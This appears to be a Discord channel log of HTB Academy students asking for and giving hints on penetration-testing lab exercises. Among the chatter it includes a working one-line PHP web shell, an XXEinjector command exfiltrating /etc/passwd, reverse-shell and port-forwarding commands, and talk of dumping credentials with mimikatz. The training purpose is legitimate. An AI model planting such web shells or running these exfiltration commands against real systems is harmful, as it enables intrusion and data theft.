#modules
You need to set the port separately in msfconsole
ah, yeah, I just tried it after seeing this and rport worked. thanks yall
Outplayed the community contributor
You’re welcome 👍🏼
I have a life so I'm just chiming in when I can
You don’t, otherwise you wouldn’t have that role
Work smarter not harder my guy
15.56% Completed on the module so far. 
Im doing the API attacks module and I'm on the question where you upload a php backdoor and then are meant to find the hostname of the target. I tried to use the script provided by the author to create a web shell. It seems to work but it prints an empty line every time I write a command.
Can't even find a writeup for this module so I really do need your help.
Yeah so I shouldn't've followed the module. Tried this much simpler web shell: <?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?> and it worked out. Don't see why they had to overcomplicate things so much.
need help on module Attacking Enterprise Networks: Web Enumeration & Exploitation
Question 1: Use the IDOR vulnerability to find a flag. Submit the flag value as your answer (flag format: HTB{}).
i tried to login as admin but idk what should i do, i tried to brute force but it fail any hint plz
hey friends, any help with Linux Local Privilege Escalation - Skills Assessment flag 4, i am at user ||barry|| and cant find any pass for ||tomcat||, i searched all the logs, hidden files and conf but found nothing, any help please
first if the shell work what's the issue also writeup and walkthrough is only allowed for tier 0 module
The web shell that was in the module didn't work. After messing around with my own shells I found something that worked.
i don't have the username for that flag in my note for some reason but if you got a shell from tomcat then the flag should be in ||/var|| and a quick find or grep should get you the flag
i know where is the flag, i got the username ||tomcatadm|| but no password
oh that part, hint bottom of one of the page
Hi, anyone for this question please?
any good machines to practice LFI?
omg finally, thank you so much
If you are still having trouble try using remote desktop connection
it took me 2 days for manual brute force 5 times and the machine block my ip and i got nothing... LOL
Well, the system has a contour-to devouir the sentenced a correct way

any hint how to escalate priv in : Windows Privilege Escalation Skills Assessment - Part I ?
https://academy.hackthebox.com/module/67/section/637
hey friends, i am at Linux Local Privilege Escalation - Skills Assessment trying to get full interactive shell but i cant click "enter" after the "stty row echo" command, anyone know a way to fix that?
i think this may be a zsh thing, try doing both of these commands on one line instead; stty raw -echo;fg
thank you so much, it worked 😊
it works now
You managed to do it from your local vm as well?
@novel shoal now are you need help?
I'm on the Attacking Common Applications module attacking ColdFusion section. I've gained a reverse shell but struggling to find what user ColdFusion is running as. I've tried whoami and checked C:\Users but none of these are the correct answer. I've then tried tasklist and netstat to try and find what's running and under what user but still can't see anything. Also gone through ColdFusion documentation and config files. Has anyone completed this section that can share how they found the answer? (Feel like I'm missing something obvious)
Would appreciate an assist on File Uploads - Skill Assessment. Read the source code, found the file upload path and rename, verified server response for date/time but still getting a 404 when verifying with a legitimate .jpg file
nevermind, I got it figured out
Hello, can I dm you pls ? Machine is buggy af.. can't do anything ^^
ok
make sure there are no spaces when submitting the answer
I need a hint with kerberos attacks - skills assessment
On the shells & payloads The Live Engagement question #1, will netcat work for a listener or do I have to use metasploit? Neither have been working at this point. I am using the rdp ifconfig ip 10.#.#.# for LHOST and the 172.#.#.# for RHOSTS.
it's up to you both of them are going to work. I personally used nc
thanks. just need a confirmation. I'll keep at it. I'm just not getting the right piece of the puzzle to fit yet.
hi guys i encountered a strange error while trying to rdp into a target machine
i am at the Pass the Ticket (PtT) from Windows section in the Password Attacks module
RDP to 10.129.230.199 with user "Administrator" and password "AnotherC0mpl3xP4$$"
thats what i am trying to do
but i get this error
can anyone help pls?
hello can I get points in htb without paying for vip?
Yes, you can do the active machines and challenges
ok thank you.
Hi guys, can anyone help me with my CPTS module, im stuck i dont know what to do
i verified me user
sure someone is going to help, but please write which module you are having problem with
Exploiting Web Vulnerabilities in Thick-Client Applications
can somebody help , Windows Privilege Escalation Skills Assessment - Part I , 2 question (Find the password for the ldapadmin account somewhere on the system.) , Im on system, how to escalate privilages any tips ?
hey guys I'm in the "Attacking Common Services - Hard" in the last Q, (find Administrator Desktop)
but I don't get it ...
I found ||testadmin|| but I'm not sure what 2 do next,
can some 1 please help me...
this should help:
#modules message
sure i can help
#modules Exploiting Web Vulnerabilities in Thick-Client Applications
I need help with the last question of the skills assessment in kerberos attacks
next hint would be ||linked remote database||
Given the capture file at /tmp/capture.pcap, what tcpdump command will enable you to read from the capture and show the output contents in Hex and ASCII? (Please use best practices when using switches) === sudo tcpdump -r /tmp/capture.pcap -X . What is wrong with this ?
-Xr
iirc
you didnt use best practices
there are several ways to achieve what the question states but only one using “best practices”
Hi! Did you finish this module? Have same trouble with this question, any hints please? 🙂
Thank you very much
hello everyone
Hey yall, im stuck on the first question of the Windows Event Logs & Finding Evil module. I found the log and filtered for the logon id: 0x3e7 but I am completely lost. Im not sure if I am supposed to narrow down the search more and what I would filter for, can anyone push me in the right direction?
What section
First section, first question
Have you filtered for event 4624 and went to the time mentioned?
Idk why you’re using the xml query to filter for logon id 0x3e7
Yeah I found the log, but Im not sure what to do afterwards
Hi I am on this nmap module doing the intermediate nmap IPS/IDS evasion section. I am supposed to get target's dns server version. I am able to get DNS port 53 to show as open but when I google it using built in scripts for dns server version is not working.
for other people it works but for this challenge it doesn't
I have tried playing around with nmap controls as well
can someone help me out?
Ah yes I remember. Don’t filter for 4624, filter for 4907. Like the section says “Delving into the log details progressively reveals a narrative. For instance, the analysis begins with Event ID 4907, which signifies an audit policy change.”
└──╼ [★]$ sudo nmap -p53 10.129.85.38 --script=dns-recursion
Starting Nmap 7.93 ( https://nmap.org ) at 2023-09-24 23:40 BST
Nmap scan report for 10.129.85.38
Host is up (0.0035s latency).
PORT STATE SERVICE
53/tcp filtered domain
Nmap done: 1 IP address (1 host up) scanned in 0.46 seconds
┌─[us-academy-1]─[10.10.15.105]─[htb-ac-605555@htb-eh0iaboljx]─[~]
└──╼ [★]$ sudo nmap -p53 10.129.85.38 --script=dns-service-discovery
Starting Nmap 7.93 ( https://nmap.org ) at 2023-09-24 23:41 BST
Nmap scan report for 10.129.85.38
Host is up (0.0035s latency).
PORT STATE SERVICE
53/tcp filtered domain
Nmap done: 1 IP address (1 host up) scanned in 0.46 seconds
can someone help me out? I have done a bunch of scans I also have tried -sS, -A, -V, etc
I got it, thank you so much
not doing anything to get DNS server version
You’re welcome
Don't forget UDP scanning
Yeah #welcome
and make sure to read rules.
did not know about verification and that just opened up alot more discord channels lol
ive been in here for awhile just never verified oop
ty pwning
yes there is they gave discount codes as prizes for the hackers clash ctf competition
If you want you can have mine, its actually useless for me because you can only use it when buying or renewing your subscription and mine wont be up for renewal well past the expiration date for the discount code
dm me if you want it
why does the ftp> get flag.txt
come back permission denied?
Anyone here who has completed the DACL I Skills Assessment and can help me with Question 3?
screw it gonna release publicly first one uses it get it discount codes for htb subscription and the gift shop
I want to ask about if I start a module when I'm using student subscription
and the subscription ends
darn already gotten
I still have the possibility to continue on this modules ?
dang that was quick
said invalid for me
sure you entered it correctly? also its only valid for yearly subscriptions and not the monthly
OHHHHHHHHHH
can someone tell me if i start a module i will have the ability to go in forever
yes once you have a module its yours forever
because I have student subscription that give the ability to use tier 0 1 2
so I have just to start them and after the end of the subscription I will still have them
I've read you have to complete it or buy it with cubes to have it forever. So if you're on student and the module is at 99% and the subscription ends, you'll have to unlock it again either with sub or cubes
@wheat garden do you know why this is happening?
might not have permission to access the directory or file
if you need more detailed help direct message me and explain to me what you're doing / working on
If you're on a student sub all you have to do is complete it
Like 8bit said
Why there is no logo for some of the new badges?
I just tried that and it didn't work
I'm trying to get the version of DNS so maybe there's something other than nmap involved?
If you are still stuck let me know
nevermind I found the flag
i'am uploading to the web root folder C:/xampp/htdoc/webshell.php, but when i browse for http://x.x.x.x/webshell.php server show 404. thanks for u help 🙂 maybe I'am uploading the wrong php code?
na i got it, i forgot to poke it to activate/force change. cheers tho
Just completed the Modern Web Exploitation Techniques, if someone needs help, just dm me
Try doing the webshell upload command twice and see what the output is
@fathom pendant The output at the second time says " File 'C:xamppdocswebshell.php' already existe" . is the server renamed My upload?
Check the messages that keep showing up in responder and read them closely.
is there a ticketing system, can't seem to verify
Switch backslash directions
guys i dont see the bubble for the support team in the academy site... need to get hold of them as everyday I have to attempt several times trying to rdp before I go through by luck
adblock, or click the ? mark.
tried without adblock and its still the same no help bubble and the help center just shows me where the bubble is. never mind it just popped now
does anyone remember which password list they used for the Attacking Common Services - Medium Lab?|| I've tried pws.list from the module resources, password.list from an earlier section, and rockyou.txt|| ||all on the uncommon port.||
what are you trying to crack
ftp
consider password mutations with custom.rule or try another service
I forgot about that ty
np
try another service
did you already get something from the FTP server? Feels like you are trying to brute-force the services without giving a proper enumeration first, however I may be wrong on this (but since you are asking for wordlists to use...)
no I didn't get anything so I am bruteforcing with a user and pass list. I tried smtp-enum-user on the other ports but nothing
Then you need to step back and re-enumerate everything
I didnt see any username anywhere
true
alright
try to see if there are other ports open
yeah there are 5 more open ports
I usually try with those who might not need credentials first
why are you still with ftp🤣
Is it on my end that I get this error? I reset the target a few times, waited at least 5 minutes and scanned, both of the FTP ports show open but I get this error. I tried anonymous
lol
maybe anonymous access isn't allowed on this ftp server
what command did you use to login
ftp random@10.129.210.191:2121
ftp [[USER@]HOST [PORT]]
that lab is weird just restart and wait 5-10 minutes
😭 i will keep doing it
all i can tell is that its not a common port
u have to discover open ports then sCV on them
I see the uncommon one and tried, I will continue to reset and wait
reset the target until you get 6 open ports
I did, they are both open and then I try and I get that error unfortunately
nah
still the wrong port
yea 2121 is rabbit hole xD
I have the ||30021||
there u go
but I get that error
wat
I am waiting 10 minutes again
try again with ftp <ip> <port>
can you run it and paste the screenshot?
yeah
I am still waiting but I did this a few minutes ago before the reset
why you using wrong command
without username
learn the syntax
use this
you dont need a colon?? omg
I feel I've done it with a colon before
lol
🤣

also dont u see the response
:21 :ftp :?
thats telling you it’s ignoring the part where you tell “30021”
which means wrong syntax and your brain has to immediately think “whats the proper syntax then?”
Everything including the command is well explained in the module and all of the above was a bit of a spoiler
I got the flag, I am sorry about all that. Thank you for all for helping
I should probably sleep
just have to pay attention to the output and do some research on the command syntax
will do
👍
no reasons to be sorry
all of us have been in your shoes
work smarter not harder, resting is something smart to do
yes, that how I found ||"testadmin"||, but I don't understand how 2 continue with that...
command execution
U mean ||xp_cmdshell||?
cause I don't have permissions ...
which user are you logged in as rn
john
have you checked the permissions for john?
it's 0
thats on the original server
have you checked his permissions on the linked server ?
trying 2 figure that out
can I DM u?
sure
Thanks.... i didnt notice this thread. i will remove my question and move it there.
you can ask your questions here
Thanks
I'm trying to go past a section in the training where I have to list all the services listening on all interfaces on the OS, not just ipv4 and eth.
Haven't been able to get the right number.
I want to understand how interfaces work though, and how services come to listen on one or more interfaces
this one time i zero dayed a windows app and i submitted a bug report and i was drunk and windows said it wasnt enough and i just didnt give a care enough to submit a proper bug report
oh wait wrong chat sorry
Could someone assist me with the Broken Authentication skills assessment? I managed to discover a valid username and password, decoded the cookie, and created an admin one. However, I'm consistently encountering a message stating something like 'user cannot change role.' I really need to complete this assessment, HELP!
@fair hornet please give two channels. one for general noobs, like me, who refuse to make an actual HTB account. and another for suggestions, where this would be a more appropriate suggestion and not require a ping.
thank.
so stop trying to change your role
that could work
idk if i got it. I need change my role to gain admin acess and get the flag.
you might think that but you might be thinking wrong. i also dont know anything of what we are talking about though
??????? why are you saying anything then? LOL You did not ended the Broken Authentication module?
you dont need to change your role. you need to change the role of the query being made against the target
AH
no. i dont play games like htb
LOL
😐
did you ever got that one ? seems i'm stuck in the same place 😐
Why are you here then?
cus its not a game noob
Help guys
its real life
Look into the “book” box from HTB, ippsec and xct have vids on it. Logrotten is used there
you have to be more specific
for the love of god give us a noob channel why did i default into modules
you can ask your questions here
sorry
Just make an account if you want access to all of the server.
i need to change my pfp to a chili pepper
no. please. dont make me. 
its a hard please ill beg for it.
How can I list all the services listening on network interfaces on my linux distro. Network interfaces including ipv4 and eth
check out the man page of the command ss
thanks
Or netstat I guess?
that could work
Thanks.
I do ss -l which lists a bunch of sockets on all protocols, but when i take the count using ss -l | wc -wcl the line count is 200 total and the academy module rejects it
AITA?
hi beautiful folks
Welcome G
hi beautiful folks,
i am extremely new into cyber security and IT i am doing this module Introduction to network analysis and i am stuck into few questions ( yes i did try many times ) kindly i would highly appreciate if u guys could help me please. thank you in advance.
Q1) If I wish to start a capture without hostname resolution, verbose output, showing contents in ASCII and hex, and grab the first 100 packets; what are the switches used? please answer in the order the switches are asked for in the question.
Q2)Given the capture file at /tmp/capture.pcap, what tcpdump command will enable you to read from the capture and show the output contents in Hex and ASCII? (Please use best practices when using switches)
Q3)What TCPDump switch will allow us to pipe the contents of a pcap file out to another function such as ‘grep’?
Q4)How do you start a capture with TCPDump to capture on eth0?
much appreciated 🙂
@oak sapphire do you need to do it on your own host or on the target host?
that's for TCPDUMP
What have you tried? As it seems all of those questions can be answered by checking the manual of tcpdump
On the target host. I'm SSH'd in using powershell
What module is this?
i did but when i put the answer it keep saying wrong answer
Lol get ChatGPT or something. Try there first
what have you tried
Linux fundamentals p12
for 1st q i put--> -nnvXc 100
Linux fundamentals and you need to ssh to a target with power shell?
for 2nd q i put -X
You have to have a VPN client with their profile too or you wont have access to their networks.
right now i'm obsessed with finding answers.
try ||-n -vXc 100||
thank u but again got incorrect answer
try ||-nvXc 100||
great, got the right answer, thank u Plut0
You were only 1 letter off lol
i think i'm interpreting the question wrong.
" How many services are listening on the target system on all interfaces? (Not on localhost and IPv4 only)"
How else to interprete @analog dock
¯_(ツ)_/¯
Did the section speak about nmap?
thank u guys, pluto do u mind helping me with other questions plz ( only if u have time, thank u )
And otherwise you can ssh to it and run netstat -tulpen
no we're not in nmap territory yet.
Should show the listening services
sure
I'll try again, but i already tried once before. count was off.
Q2)Given the capture file at /tmp/capture.pcap, what tcpdump command will enable you to read from the capture and show the output contents in Hex and ASCII? (Please use best practices when using switches)
Q3)What TCPDump switch will allow us to pipe the contents of a pcap file out to another function such as ‘grep’?
Q4)How do you start a capture with TCPDump to capture on eth0?
much appreciated 🙂
Linux fundamentals - network services?
I’ll unlock the module and check
Woah that'd be great
you can use the r and X switch for that
What section
dont forget best practices 
Workflow. P12
i did -rX but came up as wrong answer
Xr
incorrect
-r?
it would be just to read the file but won't show in ascii n hexa
you can use the ||XX|| switch for both hex and ascii
i think
unfortunately no joy 😦
||-XXr|| ?
incorrect
@oak sapphire I got the answer
haha no way!
The question asks for the services “listening”, it can NOT be on localhost, so only the 0.0.0.0 addresses, and only the ipv4 addresses, no 127.0.0.1, so only the tcp ones, not tcp6
is this kind of sorting available as options to ss? or netstat?
or using post-cat tools?
You can find it with netstat -tulpen
I did that and got a bunch of services total 200. which was wrong
You did it incorrectly
oh okay.
so tell me why the services on local and tcp6 are considered to not be "listening"
I’m not saying they aren’t listening, it’s what the question states
thats what the question said
ah... please explain.
cos you said "listen", and it shows some services on tcp6 to be in state "listen"
So?
The question literally states ipv4 only
Tcp6 is ipv6
haha but it said "not on localhost or IPv4 only"
No
hmm
That’s not what it says
hello
It says not on localhost AND ipv4 only
lol i see "and" on my end.
This is my first time playing discord. Can someone give me some Pointers?
oh, so, I'm supposed to list
condition 1: not localhost.
condition 2: ipv4 only?
And condition 3, it must be listening
yeah, keep WASD handy. and don't use cheats till like level 99
ah great'
Need to work on my comprehension skills
Well discord is not really a game, how did you find this server, and what are you looking for?
@oak sapphire if you grep listen, grep -v tcp6 and grep -v 127.*, you’ll find the answer
I'm studying at HTB Academy and want to ask some questions about file upload vulnerabilities
ask
My English is not good, so I may not express it accurately. I used a translation software
okay
https://academy.hackthebox.com/module/136/section/1288
I'm doing this exercise. My question is that why is there no file path in the upload file request
Sorry, I can't send a screenshot
To send a screenshot you have to make an acc on the main platform, and verify in #welcome
thks
in this module https://academy.hackthebox.com/module/162/section/1572 , I finish all, but for the last question I can't find the user svc_reporting in which group
I recommend sending the module and section name. Not the link
OK, in this module Documentation & Reporting Practice Lab
@analog dock I do grep -v -e "ipv6" -e "127." | wc -wcl and theres a couple udp services included, but they're not "listen" state
Did you grep “listen” ?
Thanks.
This worked.
netstat -tulpen | grep -v -e "tcp6" -e "127." | grep "LISTEN" | wc -l
👍🏼
logrotten question , how to rotate the access log to get shell, any tip? I have run ./logrotten -p payloadfile access.log
Hey, I am in the Blind Data Exfiltration module. I am using the following command "ruby XXEinjector.rb --host=10.10.14.36 --httpport=8000 --file=xxe.req --path=/etc/passwd --oob=http --phpfilter" and getting a "FTP/HTTP did not get response. XML parser cannot parse provided file or the application is not responsive. Wait or Next? W/n" as response. What should I do?
Id look at the HTB box “book”, ippsec has a walkthrough online which has the logrotten exploit
so who can help me this question
the last question
ok,thanks,let me see it
thanks my brother.
No problem, however the command has been used multiple times across the learning path material so looking back at some modules or the cheat-sheets it is definitely a good idea
yeah you're right
hi
Can someone help, please? This is the only one left to complete the entire module.
curl on my pwnbox is not working
i can ping google.com, but it times out in the adressbar
free pwnbox doesn't have full access to the internet
which module are you on? i assumed that's the section name
Yes, sorry. It is in Web Attacks
Hey guys, has anyone run into this before? a quick google search indicates it's not a common error but maybe someone here knows more 🙂
that look familiar also next time pls add which section and module are you on but if you download that tool from the creator github then there is a code bug some where in that original file and there should be a copy of that tool (that work) under C:\tools or something
There's a fix for this in the tools GitHub Issues listing.
thank you very much guys 🙂 I'll check that out
I would like some help. I cannot understand what the author is trying to explain.
https://academy.hackthebox.com/module/112/section/1067
what part do you not understand?
I did not understand the example they used.
it provides information about the smb server, hosts connected, username and groups
from an adminstrative perspective of course
smbstatus has to be used from local machine while being connected to samba server at the same time?
smbstatus is used on machines where the server is up and running
Oh, so that means it'll run on target machine.
yes
Gotcha. Thank you!
Hi everyone!
I have a question regarding the module "Broken Authentication" - "Brute Forcing Passwords":
After 5 attempts I get a time limit, so I can't brute force it with ffuf e.g.
It doesn't teach you in the module what to do in this situation
Does this exercise really want me to wait after every 5 attempts? I can't imagine that's the goal of it, or?
you can try ways of getting round it from the weak brute-force protections section
i havent done it but id assume you could spoof ip and change it or try a different username every x attempts
Perform the ExtraSids attack to compromise the parent domain from the Linux attack host. After compromising the parent domain obtain the NTLM hash for the Domain Admin user bross. Submit this hash as your answer.
---
I’ve managed to dump the NTLM hash from the bross user, but according to HTB it is incorrect. Gotten it w/ secretsdump, can anyone check if I’m missing something obvious?
feel free to DM
can you paste the first/last two chars of the NTLM hash?
first 3 chars are “aad…”, last 3 are “…4c7”
it is correct however you need only the second part separated by the colon ":" the NT part
We did it 😄
now I am gonna eat lol
almost 20 hours doing that machine lol
😂
and I could do it now in 20 minutes lol
just an average day of doing Kerberos stuff
now I can do the weekly machine lol
Question #2 on Shells & Payloads Live Engagement was a tricky one. I finally figured it out though. LHOST is probably not what you think it is. Wiping forehead it only took me 2 days. Trial & Error.. On to next question.
Kerberos Attacks: Constrained Delegation Overview & Attacking from Windows
Don't they mean DMZ01 instead of SQL01?
hello guys i created a reverse shell to do a reverse port forward ssh -R internalpivotip:port:0.0.0.0:4444 ubuntu@targetip but i cannot connect back to the reverse shell any help
hi
So, you're getting a hit back to your listener when you execute the payload but you're not getting the shell right?
Can you show me your metasploit handler options.
can someone explain a bit more to me about fetch post request? a bit confused on this one. im more concrete with post and put get curl requests, but this fetch one im a bit lost on
exactly
Double check the payload on your listener. Make sure it's the same payload for the exploit you created.
thx
XDDDDD
this is a common issue for this section
im stupid need to wear glasses
the meterpreter shell is way too big for that amounts of hop (include your vpn) try with a lighter shell like a nc shell or a metasploit tcp shell
thanks 🙂 got it now
any staff around to help with a qq on 'Attacking Web Applications with Ffuf'
One of the pages you will identify should say 'You don't have access!'. What is the full page URL?
@lean condor could you solve your issue with the lab?
I curl the page says 'You don't have access!' cant figure out what im doing wrong with entering the URL
is the exam free after i end the all the pentester modules?
you need a voucher I think
just asking
but it's pretty affordable
why, what?
nt
'<div class='center'><p>You don't have access!</p></div>' lol but i put the url with and without port
with domain and with ip
complete all the module is a prerequisite to buy the voucher
REDACTED.academy.htb:[port]/REDACTED
http://[REDACTED].academy.htb:PORT/[REDACTED]/[REDACTED].[REDACTED] shows as my old answer. so it actually says PORT instead of a number
and that was it
HAHAHA
wish it would have been obvious hahah feel like it should have been and I just missed it
Good stuff 💪🏼
no, i get stuck after uploading the webshell, server send 404. i'am using a one liner btw.
I'm stuck on Exploiting Web Vulnerabilities in Thick-Client Applications after you change the currentFolder
ClientGuiTest.this.currentFolder = "configs";
to
ClientGuiTest.this.currentFolder = "..";
When I try to recompile the JAR I get 31 errors like this one
fatty-client.jar.src\htb\fatty\client\gui\ClientGuiTest.java:397: error: cannot find symbol
/* 397 */ } catch (MessageBuildException|htb.fatty.shared.message.MessageParseException e1) {
^
I found the walkthrough for HTB Fatty by 0xdf (https://0xdf.gitlab.io/2020/08/08/jar-files-analysis-and-modifications.html#modifying-compiled-classes), and I have tried to follow along with that and the section but I haven't been able to make any progress with these compiling errors. Any help would be appreciated.
I recently ran into a challenge where I was given a Java Jar file that I needed to analyze and patch to exploit. I didn’t find many good tutorials on how to do this, so I wanted to get my notes down. For now it’s just a cheat sheet table of commands. Updated 8 Aug 2020: Now that Fatty from HackTheBox has retired, I’ve updated this post to reflec...
@tender lake there is a guy that did a nice writeup on the academy forum on the module
One of the comments there
Do have the thread name on hand?
Sorry no but just write the name thick client applications and there is a large wall of text blurred out
alls good, I'll find it.
Found the comment. Thanks @devout torrent
hi guys, 1 qn.
if there's a user beside me logged into the same host. (hes using console), how can i grab his plaintext password? using mimikatz?
which module is this
Hi, I'm doing the login brute forcing module assessment. How long is reasonable to wait for Hydra before giving up? It says it's going to take 30 hours to go through the custom wordlist I made.
Hello guys, i'm on the module footprinting hard lab, im in the mailbox but i dont know the command to see the entire mail, like i can only see subject and header but not the content, i searched some resources on the net but i cant found anything... Do you guys have some resources ? ty
checkout https://donsutherland.org/crib/imap
Thank you !
that module is more about learning patience😅 it's been a while since i've done this module so i don't remember the exact time, but i don't think i ever waited over an hour
Ah, making the wordlist simpler sorted it. It turns out when using cupp I had gone overboard in including trivia about a certain fictional character 😆
I guess the lesson is keep it simple and look for low hanging fruit first
why are you the way you are
bro can you explain me what I'm server for
why did you join this server if you didn't know already
This is also useful
That’s what I use
I linked that earlier
Ok
Link was so far back it took too long for me to load
🤷🏼♂️
Alright I am having trouble on a question due to not doing it for awhile. I cracked the password for Kira awhile ago. Of course, this is why documentation is so important, but I have forgotten, and I have attempted to crack it again to no avail. Any help?
I am in the protected files section
what module, what section
time to go back and redo it
I did many times. ran the mutated list, ran fasttrack, rockyou, etc.
Password cracking: Protected Files
I have access to Sams
I believe it gives a hint to the password. Mutate that one with the .rule file and you should be able to get it if I remember correctly
That gives you sams. It assumes that I already have Kiras
on "Attacking common services RDP" I think I need to do a pass the hash connection with the rdp client but I don't know how to get the hash for the other user, can I get a hint?
There's another module section for kiras password
It has a hint for it
nvm, there is a hash in plain text on the users desktop 💀
I dont recall off the top of my head which section references her password in the hint
It's just one of the first ones
ok let me look
Anyone available that for module Footprinting - LAB Medium, I am on the right track? I seem to hit a brick wall 😦
sure, what have you been trying so far?
I am up to the point to try to login to MSSQL using SQL Studio. But the creds (sa) I have dont seem to work. No matter what I do.
What other user could (sa) be?
Check C:\Users
hmm.
And apply critical thinking
Thx for the hint. I have something to work with now.
Many many thx
Ofc
My first steps when I access a box is check C:\users or /home/
To see what potential user accounts exist
Did that. But was staring blind on the sa acct.
Yeah just always apply critical thinking
Pffff hehe.......getting somewhere now
can anyone check if ZAP HUD from zaproxy is working on his side?
Again thanks for the push in the right direction
i think it isnt my problem coz it is happening on pwnbox
zap hud is always like a 50/50 for me, I dont bother with it
if i need something else i will just script it with Python
long life to requests library
@fathom pendant The solution is right there , thank u 😁
Yeah. I basically did the same troubleshooting when I did it
second lab was 🙃
What's up
https://academy.hackthebox.com/module/136/section/1288
I'm doing this exercise. My question is that why is there no file path in the upload file request
Ofc there's a request, you are just intercepting the wrong one
If I remember well it was a green button
How do I send a screenshot from here? Send a screenshot to make it clear
Idk
verify your account with instructions in #welcome
Just follow the steps (u need to subscribe in the main platform)
Do I have to subscribe to verify? Is it not possible to just register with HTB?
Please read #welcome and let's keep this channel on topic please
If you need help, we have #1024429874246590575
thks
nudge for AD Enumeration & Attacks - Skills Assessment Part II - Q10
hint go back to one of the ||"Poisoning"|| section
your command is right, maybe try on the pwnbox
Good idea, thanks. I did also try it on a different computer running Linux but pwnbox is worth an attempt
Can i dm you, I've been staring at inveigh for almost an hour now
sure but i've to go in 5 so let make this quick
Hi all. I am in the Pivoting, Tunneling, and Port Forwarding module, Port Forwarding with Windows Netsh and I can't run Netsh. I get "This app can't run on your PC".
nevermind
I had to open netsh.exe separately and run the command from there.
Hello everyone im trying to run juicy potato on a machine but i have a error someone know what is this?
Testing {2C256447-3F0D-4CBB-9D12-575BB20CDA0A} 1234
COM -> recv failed with error: 10038
PS C:\tools>
What section of a module is this? Anyway, you can try to use different CLSID to see if you get around the problem
Im in windows privesc module skill assessment, i try 4-5 diferent CLSID and no one works for me
I apologise in advance for the noob question. I have just started the "ACTIVE DIRECTORY ENUMERATION & ATTACKS" module Theoretically, I should use this command to rdp to host ea-attack01: xfreerdp /v:<MS01 target IP> /u:htb-student /p:Academy_student_AD!
However, even if I go up to vpn or try to connect from the htb instance, I get the following error: [09:23:27:215] [2697:2698] [ERROR][com.freerdp.core] - freerdp_tcp_is_hostname_resolvable:freerdp_set_last_error_ex ERRCONNECT_DNS_NAME_NOT_FOUND [0x00020005]
Why is the following address not resolving? Any guesses?
Can anyone Help on this , Intro to Python 3 , Conditional Statements and Loops , Question is , In "Code block 2" the blank should be filled with what, to output all numbers in a terminal? , Ive tried EVERYTHING ??????
what did you try?
you need to literally write the piece of code you need to use in order to print all the numbers in the terminal output
Thanks Will Try
Wrap the password in quotes just to be safe, not the solution for that error tho.
If you're to RDP to ea-attack01, why would you use the MS01 IP to rdp into.
If you don't mind, can you give more context?
Also, mention the section on which you're facing this issue. People have notes and can quickly help you next time.
Sorry for the typo. I tried the following command: xfreerdp /v:ea-attack01 /u:htb-student /p:Academy_student_AD!
Also:
ssh htb-student@ea-attack01
And the following module:
Active Directory Enumeration & Attacks
Subsection below:
Initial Enumeration of the Domain
Initial Initialization of Enumeration of Enumeration, and within this paragraph:
Start Wireshark on ea-attack01
The machine you're trying to rdp from doesn't know what to resolve ea-attack01 to probably. If you have the ip address, you should mention the IP address directly or add the ip and hostname to your /etc/hosts file
How can I find out the ip in this case? Unfortunately I didn't see it in the description :/
The "ea-attack01" machine is the one you land on after you get to log in via SSH
but I can't ssh because I don't know the ip and it doesn't resolve to the hostname
did you start the machine?
I only saw the option to start the workstation :/
RETBleed attack <---- anyone familiar with
Is the nessus scanner that I will need for this lab already installed on the VM ? https://academy.hackthebox.com/module/108/section/1233
ssh b.gates@94.237.59.185
b.gates@94.237.59.185: Permission denied (publickey).
How to solve the permission denied problem?
Module: LOGIN BRUTE FORCING
I'm pretty sure that the target comes with a port
Meaning that SSH does not work on the default one (22)
Silly me, thanks!
If I remember correctly, the scanner was installed
Hello all, I'm doing the Active Directory Enumeration & Attacks module and the network is behaving different than in the walkthrough
I wasn't able to capture any host requests / mdns traffic via wireshark, and the pingsweep via fping is showing 3 hosts alive, not 9 like in the walkthrough
Any input appreciated, I'm 99% positive I'm not doing anything wrong (copy pasted the commands from the lecture)
Yes, I've let the environment boot up fully before scanning, rescanned multiple times
Provide the section as well
fping -asgq 172.16.5.0/23
i ran different commands and it's the same thing (diff tools)
In the walkthrough, there's 9 hosts alive. I was under the impression the behavior of the environment in the walkthrough is meant to be 1:1 with what I'm getting
That's what has me confused, the scan itself works fine if there's actually 3 hosts alive, not 9
Afaik it isn’t necessarily 1:1. I do know that the ones you have active, are the ones you need for the questions
Very good to know, thanks
You’re welcome
@everyone
<@&861185840277487616>
wow very serious
Rate the amount of knowledge you gained from this module. Rate outta 10. 🙂
how to handle this: Error
There are no available instances. Please try again later.
Got that already for hours, cannot do my assignments.
Hey guys is it possible to retrieve the bloodhound output from the HTB Machine used through RDP to my kali machine ?
there are many ways to get the zipped file from the victim box to your attack box. there is all whole module teaching you how to download and upload
I am gettin nowhere with the hard lab of module Footprinting. Anyone able to give me a nudge/hint?
you can dm to avoid spoilers.
What have you tried
And what are you stuck on?
I got a hint already. Of course I forgot a recon/enum step.
Alright!👍🏼
I'm currently working file upload module in CPTS. Stuck on the https://academy.hackthebox.com/module/136/section/1290 type filters sections
So far, Tried with double extension too
Hello! I got stuck at Footprinting module medium lab. The sa username pw that i found on the server is not working with the sql server login. Did i miss something?
Try changing the login type when logging into mssql
Did you try character injection?
Or maybe there's a higher privilege user with that password
The webserver is not able to run all the files
Tried
You've tried windows Auth yeah?
Like I said you may need to use a higher privilege user 😉
Alright
I'm just trying to poke you into thinking critically about the info you have
Because currently you do have the info to get the answer
Yeah, we have alex, admin and public users on the server
And i found a important.txt on an another server with these credentials
Don't tell me. Try with the information I've poked you with and come back if that doesn't work
Looks like it was the credentials for the mysql bc the username was already there when i open it
Mssql
Do not mix the two up
Don't spoil on others, but always try to authenticate to the system with the highest user you got
Sorry
You have all the info needed to escalate privileges
Iirc you can run mssql as admin
And you DO have the password
Thank you
7.5
What restrained you from rating it 10?
I'm working on the Blind Data Exfiltration section of the Web Attacks module. I've tried both of the methods in the section (manual and automated using XXEInjector). Neither method has worked for me so far. For the manual method, I start a PHP server on my attack box and forward the request from burp as shown in the section, and back in the terminal I see that there was an accepted request, but then I don't see anything else. I just see "CLOSING." For the XXEInjector approach, I get "Cannot resolve hostname." Does anyone have any tips?
in linux priv escal. logrotten, i have to construct a different payload for the attack to work? because i dont seem to get a reverse shell
Hey, anyone available to help with logrotten in linux privesc ? It doesn't seem to win the race condition
Hi! I just signed up for a paid account and am running into an issue. I already posted on the community chat but did not get an answer. I tried the support bot, but no luck. Can anyone help?
the support bot will help you with a real human when available
am stuck here too haha
@eager siren and I are both stuck while we think we pretty much did everything we could to exploit correctly the weakness, anyone has solved it to help us ?
